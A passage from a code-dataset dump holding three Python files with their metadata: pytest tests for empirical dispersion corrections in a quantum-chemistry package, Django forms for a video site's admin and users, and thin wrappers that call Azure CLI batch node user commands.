6.40446102957e-05, 5.1224992828e-06, 2.84676586879e-08]).reshape((-1, 3)),
np.array([
0.00000000000000E+00, 0.00000000000000E+00, -3.49290530324e-05,
0.00000000000000E+00, 0.00000000000000E+00, 3.41911680578e-05,
0.00000000000000E+00, 0.00000000000000E+00, 3.99755714285e-05,
0.00000000000000E+00, 0.00000000000000E+00, -3.9237686454e-05]).reshape((-1, 3)),
np.array([
0.00000000000, 6.40910926532e-05, -5.69353173759e-08,
0.00000000000, -6.40910926532e-05, -5.69353173759e-08,
6.40446102957e-05, -5.1224992828e-06, 2.84676586879e-08,
-6.40446102957e-05, -5.1224992828e-06, 2.84676586879e-08,
-6.40446102957e-05, 5.1224992828e-06, 2.84676586879e-08,
6.40446102957e-05, 5.1224992828e-06, 2.84676586879e-08,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00]).reshape((-1, 3)),
np.array([
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, -3.49290530324e-05,
0.00000000000000E+00, 0.00000000000000E+00, 3.41911680578e-05,
0.00000000000000E+00, 0.00000000000000E+00, 3.99755714285e-05,
0.00000000000000E+00, 0.00000000000000E+00, -3.9237686454e-05]).reshape((-1, 3)),
])) # yapf: disable
gref['ne'] = {}
gref['ne']['B3LYP-D3(BJ)'] = {'atom': np.zeros(3).reshape((-1, 3))}
gref['ne']['MP2-DMP2'] = {'atom': np.zeros(3).reshape((-1, 3))}
gref['ne']['ATM'] = {'atom': np.zeros(3).reshape((-1, 3))}
seneyne = """
C 0.000000 -0.667578 -2.124659
C 0.000000 0.667578 -2.124659
H 0.923621 -1.232253 -2.126185
H -0.923621 -1.232253 -2.126185
H -0.923621 1.232253 -2.126185
H 0.923621 1.232253 -2.126185
--
C 0.000000 0.000000 2.900503
C 0.000000 0.000000 1.693240
H 0.000000 0.000000 0.627352
H 0.000000 0.000000 3.963929
"""
sne = """
Ne 0 0 0
"""
def eneyne_ne_qcdbmols():
if not is_program_new_enough("psi4", "1.4a1.dev55"):
pytest.skip("Psi4 requires at least Psi4 v1.3rc2")
from psi4.driver import qcdb
eneyne = qcdb.Molecule(seneyne)
ne = qcdb.Molecule(sne)
mols = {
'eneyne': {
'dimer': eneyne,
'mA': eneyne.extract_subsets(1),
'mB': eneyne.extract_subsets(2),
'mAgB': eneyne.extract_subsets(1, 2),
'gAmB': eneyne.extract_subsets(2, 1),
},
'ne': {
'atom': ne,
}
}
return mols
def eneyne_ne_psi4mols():
if not is_program_new_enough("psi4", "1.4a1.dev55"):
pytest.skip("Psi4 requires at least Psi4 v1.3rc2")
import psi4
eneyne = psi4.core.Molecule.from_string(seneyne)
ne = psi4.core.Molecule.from_string(sne)
mols = {
'eneyne': {
'dimer': eneyne,
'mA': eneyne.extract_subsets(1),
'mB': eneyne.extract_subsets(2),
'mAgB': eneyne.extract_subsets(1, 2),
'gAmB': eneyne.extract_subsets(2, 1),
},
'ne': {
'atom': ne,
}
}
return mols
def eneyne_ne_qcschemamols():
eneyne = qcel.molparse.to_schema(qcel.molparse.from_string(seneyne)['qm'], dtype=2)
mA = qcel.molparse.to_schema(qcel.molparse.from_string('\n'.join(seneyne.splitlines()[:7]))['qm'], dtype=2)
mB = qcel.molparse.to_schema(qcel.molparse.from_string('\n'.join(seneyne.splitlines()[-4:]))['qm'], dtype=2)
ne = qcel.molparse.to_schema(qcel.molparse.from_string(sne)['qm'], dtype=2)
mAgB = qcel.molparse.from_string(seneyne)['qm']
mAgB['real'] = [(iat < mAgB['fragment_separators'][0])
for iat in range(len(mAgB['elem']))] # works b/c chgmult doesn't need refiguring
mAgB = qcel.molparse.to_schema(mAgB, dtype=2)
gAmB = qcel.molparse.from_string(seneyne)['qm']
gAmB['real'] = [(iat >= gAmB['fragment_separators'][0]) for iat in range(len(gAmB['elem']))]
gAmB = qcel.molparse.to_schema(gAmB, dtype=2)
mols = {
'eneyne': {
'dimer': eneyne,
'mA': mA,
'mB': mB,
'mAgB': mAgB,
'gAmB': gAmB,
},
'ne': {
'atom': ne,
}
}
return mols
db3lypd3bj = {
'dashlevel': 'd3bj',
'dashparams': {
's8': 1.9889,
's6': 1.0,
'a2': 4.4211,
'a1': 0.3981
},
'dashparams_citation': '',
'fctldash': 'b3lyp-d3(bj)'
}
db3lypd3bjcustom = copy.deepcopy(db3lypd3bj)
db3lypd3bjcustom['fctldash'] = ''
db3lypd3bjcustom['dashparams']['a2'] = 5.4211
dpbed3zero = {
'dashlevel': 'd3zero',
'dashparams': {
's6': 1.0,
's8': 0.722,
'sr6': 1.217,
'sr8': 1.0,
'alpha6': 14.0
},
'dashparams_citation': '',
'fctldash': 'pbe-d3'
}
atmgr = {
'dashlevel': 'atmgr',
'dashparams': {
'alpha6': 14.0,
},
'dashparams_citation': '',
'fctldash': 'atm(gr)',
}
chg = {
'dashlevel': 'chg',
'dashparams': {
's6': 1.0,
},
'dashparams_citation': '',
'fctldash': 'chg',
}
dmp2dmp2 = {
'dashlevel': 'dmp2',
'dashparams': {
's8': 1.187,
'a1': 0.944,
'a2': 0.480,
'rcut': 0.72,
'w': 0.20,
},
'dashparams_citation': '',
'fctldash': 'mp2-dmp2'
}
def _compute_key(pjrec):
return pjrec['fctldash'].upper()
## Tests
@pytest.mark.parametrize("inp,expected", [
(({'name_hint': 'b3lyp', 'level_hint': 'd3bj'}, 'B3LYP-D3(BJ)'), db3lypd3bj),
(({'name_hint': 'b3LYP', 'level_hint': 'D3bj'}, 'B3LYP-D3(BJ)'), db3lypd3bj),
(({'param_tweaks': {'s8': 1.9889, 's6': 1.0, 'a2': 4.4211, 'a1': 0.3981}, 'level_hint': 'd3bj'}, 'B3LYP-D3(BJ)'), db3lypd3bj),
(({'name_hint': 'b3lyp', 'level_hint': 'd3bJ', 'param_tweaks': {'a2': 4.4211}}, 'B3LYP-D3(BJ)'), db3lypd3bj),
(({'verbose': 3, 'name_hint': 'b3lyp', 'level_hint': 'd3bJ', 'param_tweaks': {'a2': 5.4211}}, ''), db3lypd3bjcustom),
(({'name_hint': 'b3lyp-d3bj', 'param_tweaks': {'a2': 4.4211}}, 'B3LYP-D3(BJ)'), db3lypd3bj),
(({'name_hint': 'pbe', 'level_hint': 'd3zero'}, 'PBE-D3'), dpbed3zero),
(({'name_hint': 'pbe', 'level_hint': 'd3'}, 'PBE-D3'), dpbed3zero),
(({'name_hint': 'pbe-d3'}, 'PBE-D3'), dpbed3zero),
(({'name_hint': 'atm(gr)', 'level_hint': 'atmgr'}, 'ATM(GR)'), atmgr),
(({'name_hint': 'atmgr'}, 'ATM(GR)'), atmgr),
(({'name_hint': 'bp86-atmgr'}, 'ATM(GR)'), atmgr),
(({'name_hint': 'asdf-chg'}, 'CHG'), chg),
(({'name_hint': 'mp2-dmp2'}, 'MP2-DMP2'), dmp2dmp2),
(({'name_hint': 'MP2', 'level_hint': 'dmp2'}, 'MP2-DMP2'), dmp2dmp2),
]) # yapf: disable
def test_dftd3__from_arrays(inp, expected):
res = empirical_dispersion_resources.from_arrays(**inp[0])
assert compare_recursive(expected, res, atol=1.e-4)
assert compare(inp[1], _compute_key(res), 'key')
res = empirical_dispersion_resources.from_arrays(name_hint=res['fctldash'],
level_hint=res['dashlevel'],
param_tweaks=res['dashparams'])
assert compare_recursive(expected, res, tnm() + ' idempotent', atol=1.e-4)
@pytest.mark.parametrize("inp", [
({'name_hint': 'b3lyp', 'level_hint': 'd3bJ', 'param_tweaks': {'a3': 5.4211}}),
({'name_hint': 'fakeb3lyp', 'level_hint': 'd3bJ', 'param_tweaks': {'s6': 5.4211}}),
({'level_hint': 'd3bJ', 'param_tweaks': {'s6': 5.4211}}),
({'name_hint': 'b3lyp-d3bj', 'param_tweaks': {'a2': 4.4211, 'zzz': 0.0}}),
({'name_hint': 'asdf-d4'}),
({'name_hint': 'atm(gr)', 'level_hint': 'chg'}),
]) # yapf:disable
def test_dftd3__from_arrays__error(inp):
with pytest.raises(qcng.exceptions.InputError):
empirical_dispersion_resources.from_arrays(**inp)
def test_dftd3__from_arrays__supplement():
ans = {
'dashlevel': 'chg',
'dashparams': {
's6': 4.05
},
'fctldash': 'asdf-d4',
'dashparams_citation': ' mypaper\n'
}
supp = {'chg': {'definitions': {'asdf-d4': {'params': {'s6': 4.05}, 'citation': ' mypaper\n'}}}}
res = empirical_dispersion_resources.from_arrays(name_hint='asdf-d4', level_hint='chg', dashcoeff_supplement=supp)
assert compare_recursive(ans, res, atol=1.e-4)
with pytest.raises(qcng.exceptions.InputError) as e:
empirical_dispersion_resources.from_arrays(name_hint=res['fctldash'],
level_hint=res['dashlevel'],
param_tweaks=res['dashparams'])
assert "Can't guess -D correction level" in str(e.value)
res = empirical_dispersion_resources.from_arrays(name_hint=res['fctldash'],
level_hint=res['dashlevel'],
param_tweaks=res['dashparams'],
dashcoeff_supplement=supp)
assert compare_recursive(ans, res, tnm() + ' idempotent', atol=1.e-4)
@using_dftd3
def test_3():
sys = qcel.molparse.from_string(seneyne)['qm']
resinp = {
'schema_name': 'qcschema_input',
'schema_version': 1,
'molecule': qcel.molparse.to_schema(sys, dtype=2),
'driver': 'energy',
'model': {
'method': 'b3lyp',
},
'keywords': {
'level_hint': 'd3bj'
},
}
res = qcng.compute(resinp, 'dftd3', raise_error=True)
res = res.dict()
#res = dftd3.run_dftd3_from_arrays(molrec=sys, name_hint='b3lyp', level_hint='d3bj')
assert compare('B3LYP-D3(BJ)', _compute_key(res['extras']['local_keywords']), 'key')
@using_dftd3
@pytest.mark.parametrize(
"subjects",
[
pytest.param(eneyne_ne_psi4mols, marks=using_psi4),
pytest.param(eneyne_ne_qcdbmols,
marks=using_psi4), # needs qcdb.Molecule, presently more common in psi4 than in qcdb
],
ids=['qmol', 'pmol'])
@pytest.mark.parametrize(
"inp", [
({'first': 'b3lyp', 'second': 'd', 'parent': 'eneyne', 'subject': 'dimer', 'lbl': 'B3LYP-D2'}),
({'first': 'b3lyp', 'second': 'd3bj', 'parent': 'eneyne', 'subject': 'mA', 'lbl': 'B3LYP-D3(BJ)'}),
({'first': 'pbe', 'second': 'd3zero', 'parent': 'eneyne', 'subject': 'mB', 'lbl': 'PBE-D3'}),
({'first': 'pbe', 'second': 'd3zero', 'parent': 'eneyne', 'subject': 'gAmB', 'lbl': 'PBE-D3'}),
({'first': 'pbe', 'second': 'd2', 'parent': 'eneyne', 'subject': 'mAgB', 'lbl': 'PBE-D2'}),
({'first': 'b3lyp', 'second': 'd3bj', 'parent': 'ne', 'subject': 'atom', 'lbl': 'B3LYP-D3(BJ)'}),
#({'first': '', 'second': 'atmgr', 'parent': 'eneyne', 'subject': 'dimer', 'lbl': 'ATM'}),
#({'first': 'b3lyp', 'second': 'atmgr', 'parent': 'eneyne', 'subject': 'mA', 'lbl': 'ATM'}),
#({'first': 'pbe', 'second': 'atm(gr)', 'parent': 'eneyne', 'subject': 'mB', 'lbl': 'ATM'}),
#({'first': '', 'second': 'ATMgr', 'parent': 'eneyne', 'subject': 'mAgB', 'lbl': 'ATM'}),
# below two xfail until dftd3 that's only 2-body is out of psi4 proper
pytest.param({'first': 'atmgr', 'second': 'atmgr', 'parent': 'eneyne', 'subject': 'gAmB', 'lbl': 'ATM'}, marks=[using_dftd3_321]),
pytest.param({'first': 'pbe-atmgr', 'second': None, 'parent': 'ne', 'subject': 'atom', 'lbl': 'ATM'}, marks=[using_dftd3_321]),
]) # yapf: disable
def test_molecule__run_dftd3__23body(inp, subjects):
subject = subjects()[inp['parent']][inp['subject']]
expected = ref[inp['parent']][inp['lbl']][inp['subject']]
gexpected = gref[inp['parent']][inp['lbl']][inp['subject']]
E, G = subject.run_dftd3(inp['first'], inp['second'])
assert compare_values(expected, E, atol=1.e-7)
assert compare_values(gexpected, G, atol=1.e-7)
@using_qcdb
def test_qcdb__energy_d3():
eneyne = qcdb.set_molecule(seneyne)
eneyne.update_geometry()
E, jrec = qcdb.energy('d3-b3lyp-d2', return_wfn=True)
assert compare_values(ref['eneyne']['B3LYP-D2']['dimer'], E, 7, 'P: Ethene-Ethyne -D2')
assert compare_values(ref['eneyne']['B3LYP-D2']['dimer'], jrec['qcvars']['DISPERSION CORRECTION ENERGY'].data, 7,
tnm())
assert compare_values(ref['eneyne']['B3LYP-D2']['dimer'],
jrec['qcvars']['B3LYP-D2 DISPERSION CORRECTION ENERGY'].data, 7, tnm())
mA = eneyne.extract_subsets(1)
E, jrec = qcdb.energy('d3-b3lyp-d3bj', return_wfn=True, molecule=mA)
assert compare_values(ref['eneyne']['B3LYP-D3(BJ)']['mA'], E, 7, tnm())
assert compare_values(ref['eneyne']['B3LYP-D3(BJ)']['mA'], jrec['qcvars']['DISPERSION CORRECTION ENERGY'].data, 7,
tnm())
assert compare_values(ref['eneyne']['B3LYP-D3(BJ)']['mA'],
jrec['qcvars']['B3LYP-D3(BJ) DISPERSION CORRECTION ENERGY'].data, 7, tnm())
@using_mp2d
@pytest.mark.parametrize(
"subjects",
[
pytest.param(eneyne_ne_psi4mols, marks=using_psi4),
pytest.param(eneyne_ne_qcdbmols,
marks=using_psi4), # needs qcdb.Molecule, presently more common in psi4 than in qcdb
pytest.param(eneyne_ne_qcschemamols),
],
ids=['qmol', 'pmol', 'qcmol'])
@pytest.mark.parametrize("inp", [
({'parent': 'eneyne', 'name': 'mp2d-mp2-dmp2', 'subject': 'dimer', 'lbl': 'MP2-DMP2'}),
({'parent': 'eneyne', 'name': 'mp2d-mp2-dmp2', 'subject': 'mA', 'lbl': 'MP2-DMP2'}),
({'parent': 'eneyne', 'name': 'mp2d-mp2-dmp2', 'subject': 'mB', 'lbl': 'MP2-DMP2'}),
({'parent': 'eneyne', 'name': 'mp2d-mp2-dmp2', 'subject': 'gAmB', 'lbl': 'MP2-DMP2'}),
({'parent': 'eneyne', 'name': 'mp2d-mp2-dmp2', 'subject': 'mAgB', 'lbl': 'MP2-DMP2'}),
({'parent': 'ne', 'name': 'mp2d-mp2-dmp2', 'subject': 'atom', 'lbl': 'MP2-DMP2'}),
]) # yapf: disable
def test_mp2d__run_mp2d__2body(inp, subjects, request):
subject = subjects()[inp['parent']][inp['subject']]
expected = ref[inp['parent']][inp['lbl']][inp['subject']]
gexpected = gref[inp['parent']][inp['lbl']][inp['subject']].ravel()
if 'qcmol' in request.node.name:
mol = subject
else:
mol = subject.to_schema(dtype=2)
resinp = {
'schema_name': 'qcschema_input',
'schema_version': 1,
'molecule': mol,
'driver': 'gradient',
'model': {
'method': inp['name']
},
'keywords': {},
}
jrec = qcng.compute(resinp, 'mp2d', raise_error=True)
jrec = jrec.dict()
#assert len(jrec['extras']['qcvars']) == 8
assert compare_values(expected, jrec['extras']['qcvars']['CURRENT ENERGY'], atol=1.e-7)
assert compare_values(expected, jrec['extras']['qcvars']['DISPERSION CORRECTION ENERGY'], atol=1.e-7)
assert compare_values(expected, jrec['extras']['qcvars'][inp['lbl'] + ' DISPERSION CORRECTION ENERGY'], atol=1.e-7)
assert compare_values(gexpected, jrec['extras']['qcvars']['CURRENT GRADIENT'], atol=1.e-7)
assert compare_values(gexpected, jrec['extras']['qcvars']['DISPERSION CORRECTION GRADIENT'], atol=1.e-7)
assert compare_values(gexpected,
jrec['extras']['qcvars'][inp['lbl'] + ' DISPERSION CORRECTION GRADIENT'],
atol=1.e-7)
@using_dftd3
@pytest.mark.parametrize(
"subjects",
[
pytest.param(eneyne_ne_psi4mols, marks=using_psi4),
pytest.param(eneyne_ne_qcdbmols,
marks=using_psi4), # needs qcdb.Molecule, presently more common in psi4 than in qcdb
pytest.param(eneyne_ne_qcschemamols),
],
ids=['qmol', 'pmol', 'qcmol'])
@pytest.mark.parametrize("inp", [
({'parent': 'eneyne', 'name': 'd3-b3lyp-d', 'subject': 'dimer', 'lbl': 'B3LYP-D2'}),
({'parent': 'eneyne', 'name': 'd3-b3lyp-d3bj', 'subject': 'mA', 'lbl': 'B3LYP-D3(BJ)'}),
({'parent': 'eneyne', 'name': 'd3-PBE-D3zero', 'subject': 'mB', 'lbl': 'PBE-D3'}),
({'parent': 'eneyne', 'name': 'd3-PBE-D3zero', 'subject': 'gAmB', 'lbl': 'PBE-D3'}),
({'parent': 'eneyne', 'name': 'd3-PBE-D2', 'subject': 'mAgB', 'lbl': 'PBE-D2'}),
({'parent': 'ne', 'name': 'd3-b3lyp-d3bj', 'subject': 'atom', 'lbl': 'B3LYP-D3(BJ)'}),
]) # yapf: disable
def test_dftd3__run_dftd3__2body(inp, subjects, request):
subject = subjects()[inp['parent']][inp['subject']]
expected = ref[inp['parent']][inp['lbl']][inp['subject']]
gexpected = gref[inp['parent']][inp['lbl']][inp['subject']].ravel()
if 'qcmol' in request.node.name:
mol = subject
else:
mol = subject.to_schema(dtype=2)
resinp = {
'schema_name': 'qcschema_input',
'schema_version': 1,
'molecule': mol,
'driver': 'gradient',
'model': {
'method': inp['name']
},
'keywords': {},
}
jrec = qcng.compute(resinp, 'dftd3', raise_error=True)
jrec = jrec.dict()
assert len(jrec['extras']['qcvars']) == 8
assert compare_values(expected, jrec['extras']['qcvars']['CURRENT ENERGY'], atol=1.e-7)
assert compare_values(expected, jrec['extras']['qcvars']['DISPERSION CORRECTION ENERGY'], atol=1.e-7)
assert compare_values(expected, jrec['extras']['qcvars']['2-BODY DISPERSION CORRECTION ENERGY'], atol=1.e-7)
assert compare_values(expected, jrec['extras']['qcvars'][inp['lbl'] + ' DISPERSION CORRECTION ENERGY'], atol=1.e-7)
assert compare_values(gexpected, jrec['extras']['qcvars']['CURRENT GRADIENT'], atol=1.e-7)
assert compare_values(gexpected, jrec['extras']['qcvars']['DISPERSION CORRECTION GRADIENT'], atol=1.e-7)
assert compare_values(gexpected, jrec['extras']['qcvars']['2-BODY DISPERSION CORRECTION GRADIENT'], atol=1.e-7)
assert compare_values(gexpected,
jrec['extras']['qcvars'][inp['lbl'] + ' DISPERSION CORRECTION GRADIENT'],
atol=1.e-7)
@using_dftd3_321
@pytest.mark.parametrize(
"subjects",
[
pytest.param(eneyne_ne_psi4mols, marks=using_psi4),
pytest.param(eneyne_ne_qcdbmols,
marks=using_psi4), # needs qcdb.Molecule, presently more common in psi4 than in qcdb
pytest.param(eneyne_ne_qcschemamols),
],
ids=['qmol', 'pmol', 'qcmol'])
@pytest.mark.parametrize("inp", [
({'parent': 'eneyne', 'name': 'd3-atmgr', 'subject': 'dimer', 'lbl': 'ATM'}),
({'parent': 'eneyne', 'name': 'd3-b3lyp-atmgr', 'subject': 'mA', 'lbl': 'ATM'}),
({'parent': 'eneyne', 'name': 'd3-pbe-atm(gr)', 'subject': 'mB', 'lbl': 'ATM'}),
({'parent': 'eneyne', 'name': 'd3-ATMgr', 'subject': 'mAgB', 'lbl': 'ATM'}),
({'parent': 'eneyne', 'name': 'd3-atmgr', 'subject': 'gAmB', 'lbl': 'ATM'}),
({'parent': 'ne', 'name': 'd3-atmgr', 'subject': 'atom', 'lbl': 'ATM'}),
]) # yapf: disable
def test_dftd3__run_dftd3__3body(inp, subjects, request):
subject = subjects()[inp['parent']][inp['subject']]
expected = ref[inp['parent']][inp['lbl']][inp['subject']]
gexpected = gref[inp['parent']][inp['lbl']][inp['subject']].ravel()
if 'qcmol' in request.node.name:
mol = subject
else:
mol = subject.to_schema(dtype=2)
resinp = {
'schema_name': 'qcschema_input',
'schema_version': 1,
'molecule': mol,
'driver': 'gradient',
'model': {
'method': inp['name']
},
'keywords': {},
}
jrec = qcng.compute(resinp, 'dftd3', raise_error=True)
jrec = jrec.dict()
assert len(jrec['extras']['qcvars']) == 8
assert compare_values(expected, jrec['extras']['qcvars']['CURRENT ENERGY'], atol=1.e-7)
assert compare_values(expected, jrec['extras']['qcvars']['DISPERSION CORRECTION ENERGY'], atol=1.e-7)
assert compare_values(expected, jrec['extras']['qcvars']['3-BODY DISPERSION CORRECTION ENERGY'], atol=1.e-7)
assert compare_values(expected,
jrec['extras']['qcvars']['AXILROD-TELLER-MUTO 3-BODY DISPERSION CORRECTION ENERGY'],
atol=1.e-7)
assert compare_values(gexpected, jrec['extras']['qcvars']['CURRENT GRADIENT'], atol=1.e-7)
assert compare_values(gexpected, jrec['extras']['qcvars']['DISPERSION CORRECTION GRADIENT'], atol=1.e-7)
assert compare_values(gexpected, jrec['extras']['qcvars']['3-BODY DISPERSION CORRECTION GRADIENT'], atol=1.e-7)
assert compare_values(gexpected,
jrec['extras']['qcvars']['AXILROD-TELLER-MUTO 3-BODY DISPERSION CORRECTION GRADIENT'],
atol=1.e-7)
| 50.031868
| 138
| 0.66652
| 5,744
| 45,529
| 5.23172
| 0.085306
| 0.228412
| 0.256963
| 0.261123
| 0.865429
| 0.832252
| 0.794083
| 0.76836
| 0.713687
| 0.701175
| 0
| 0.450242
| 0.152694
| 45,529
| 909
| 139
| 50.086909
| 0.328745
| 0.023282
| 0
| 0.553398
| 0
| 0
| 0.128584
| 0
| 0
| 0
| 0
| 0
| 0.053398
| 1
| 0.01699
| false
| 0
| 0.012136
| 0.001214
| 0.033981
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
be4d32813913f9706eedc11c2e371d8d4cadf975
| 6,914
|
py
|
Python
|
myadmin/forms.py
|
Hoofeycheng/videoproject
|
ebb7df4d07085f9e4adeac8273ea19ff6f2667b6
|
[
"MIT"
] | null | null | null |
myadmin/forms.py
|
Hoofeycheng/videoproject
|
ebb7df4d07085f9e4adeac8273ea19ff6f2667b6
|
[
"MIT"
] | null | null | null |
myadmin/forms.py
|
Hoofeycheng/videoproject
|
ebb7df4d07085f9e4adeac8273ea19ff6f2667b6
|
[
"MIT"
] | null | null | null |
from django import forms
from django.contrib.auth.forms import AuthenticationForm
from django.core.exceptions import ValidationError
from users.models import User
from video.models import Video, Classification
class UserLoginForm(AuthenticationForm):
username = forms.CharField(min_length=4,max_length=30,
error_messages={
'min_length': '用户名不少于4个字符',
'max_length': '用户名不能多于30个字符',
'required': '用户名不能为空',
},
widget=forms.TextInput(attrs={'placeholder': '请输入用户名'}))
password = forms.CharField(min_length=8,max_length=30,
error_messages={
'min_length': '密码不少于8个字符',
'max_length': '密码不能多于30个字符',
'required': '密码不能为空',
},
widget=forms.PasswordInput(attrs={'placeholder': '请输入密码'}))
class Meta:
model = User
fields = ['username', 'password']
error_messages = {'invalid_login': '用户名或密码错误', }
class VideoPublishForm(forms.ModelForm):
title = forms.CharField(min_length=4, max_length=200, required=True,
error_messages={
'min_length': '至少4个字符',
'max_length': '不能多于200个字符',
'required': '标题不能为空'
},
widget=forms.TextInput(attrs={'placeholder': '请输入内容'}))
desc = forms.CharField(min_length=4, max_length=200, required=True,
error_messages={
'min_length': '至少4个字符',
'max_length': '不能多于200个字符',
'required': '描述不能为空'
},
widget=forms.Textarea(attrs={'placeholder': '请输入内容'}))
cover = forms.ImageField(required=True,
error_messages={
'required': '封面不能为空'
},
widget=forms.FileInput(attrs={'class' : 'n'}))
status = forms.CharField(min_length=1, max_length=1, required=False,
widget=forms.HiddenInput(attrs={'value':'0'}))
class Meta:
model = Video
fields = ['title', 'desc','status', 'cover', 'classification']
class VideoEditForm(forms.ModelForm):
title = forms.CharField(min_length=4, max_length=200, required=True,
error_messages={
'min_length': '至少4个字符',
'max_length': '不能多于200个字符',
'required': '标题不能为空'
},
widget=forms.TextInput(attrs={'placeholder': '请输入内容'}))
desc = forms.CharField(min_length=4, max_length=200, required=True,
error_messages={
'min_length': '至少4个字符',
'max_length': '不能多于200个字符',
'required': '描述不能为空'
},
widget=forms.Textarea(attrs={'placeholder': '请输入内容'}))
cover = forms.ImageField(required=True,
error_messages={
'required': '封面不能为空'
},
widget=forms.FileInput(attrs={'class' : 'n'}))
status = forms.CharField(min_length=1,max_length=1,required=False,
widget=forms.HiddenInput())
# classification = forms.ModelChoiceField(queryset=Classification.objects.all())
# classification = forms.CharField(min_length=1,max_length=1,required=False,
# widget=forms.HiddenInput())
class Meta:
model = Video
fields = ['title', 'desc', 'status', 'cover','classification']
class UserAddForm(forms.ModelForm):
username = forms.CharField(min_length=4,max_length=30,
error_messages={
'min_length': '用户名不少于4个字符',
'max_length': '用户名不能多于30个字符',
'required': '用户名不能为空',
},
widget=forms.TextInput(attrs={'placeholder': '请输入用户名'}))
password = forms.CharField(min_length=8,max_length=30,
error_messages={
'min_length': '密码不少于8个字符',
'max_length': '密码不能多于30个字符',
'required': '密码不能为空',
},
widget=forms.PasswordInput(attrs={'placeholder': '请输入密码'}))
class Meta:
model = User
fields = ['username', 'password','is_staff' ]
def username_validate(value):
if value == "admin":
raise ValidationError('不能编辑超级管理员')
class UserEditForm(forms.ModelForm):
username = forms.CharField(min_length=4, max_length=30, required=True,
validators=[username_validate],
error_messages={
'min_length': '至少4个字符',
'max_length': '不能多于30个字符',
'required': '用户名不能为空'
},
widget=forms.TextInput(attrs={'placeholder': '请输入用户名'}))
class Meta:
model = User
fields = ['username','is_staff']
class ClassificationAddForm(forms.ModelForm):
title = forms.CharField(min_length=2, max_length=30, required=True,
error_messages={
'min_length': '至少2个字符',
'max_length': '不能多于30个字符',
'required': '不能为空'
},
widget=forms.TextInput(attrs={'placeholder': '请输入分类名称'}))
class Meta:
model = Classification
fields = ['title', 'status' ]
class ClassificationEditForm(forms.ModelForm):
title = forms.CharField(min_length=2, max_length=30, required=True,
error_messages={
'min_length': '至少2个字符',
'max_length': '不能多于30个字符',
'required': '不能为空'
},
widget=forms.TextInput(attrs={'placeholder': '请输入分类名称'}))
class Meta:
model = Classification
fields = ['title','status']
| 44.320513
| 90
| 0.453572
| 502
| 6,914
| 6.109562
| 0.187251
| 0.073362
| 0.0776
| 0.104989
| 0.813825
| 0.809912
| 0.799478
| 0.787414
| 0.768829
| 0.768829
| 0
| 0.020919
| 0.439977
| 6,914
| 156
| 91
| 44.320513
| 0.771178
| 0.029795
| 0
| 0.713178
| 0
| 0
| 0.145563
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.007752
| false
| 0.046512
| 0.03876
| 0
| 0.27907
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
beb59c019310405492753fb8c5abc4f8e2f10488
| 1,834
|
py
|
Python
|
test/pyaz/batch/node/user/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | null | null | null |
test/pyaz/batch/node/user/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | 9
|
2021-09-24T16:37:24.000Z
|
2021-12-24T00:39:19.000Z
|
test/pyaz/batch/node/user/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | null | null | null |
import json, subprocess
from .... pyaz_utils import get_cli_name, get_params
def create(pool_id, node_id, name=None, is_admin=None, expiry_time=None, password=None, ssh_public_key=None, json_file=None, account_name=None, account_key=None, account_endpoint=None):
params = get_params(locals())
command = "az batch node user create " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def delete(pool_id, node_id, user_name, yes=None, account_name=None, account_key=None, account_endpoint=None):
params = get_params(locals())
command = "az batch node user delete " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def reset(pool_id, node_id, user_name, password=None, expiry_time=None, ssh_public_key=None, json_file=None, account_name=None, account_key=None, account_endpoint=None):
params = get_params(locals())
command = "az batch node user reset " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
| 39.869565
| 185
| 0.689749
| 245
| 1,834
| 5.028571
| 0.212245
| 0.080357
| 0.048701
| 0.029221
| 0.859578
| 0.859578
| 0.82711
| 0.82711
| 0.82711
| 0.82711
| 0
| 0.004068
| 0.195747
| 1,834
| 45
| 186
| 40.755556
| 0.831186
| 0
| 0
| 0.804878
| 0
| 0
| 0.058342
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.073171
| false
| 0.04878
| 0.04878
| 0
| 0.195122
| 0.219512
| 0
| 0
| 0
| null | 0
| 0
| 0
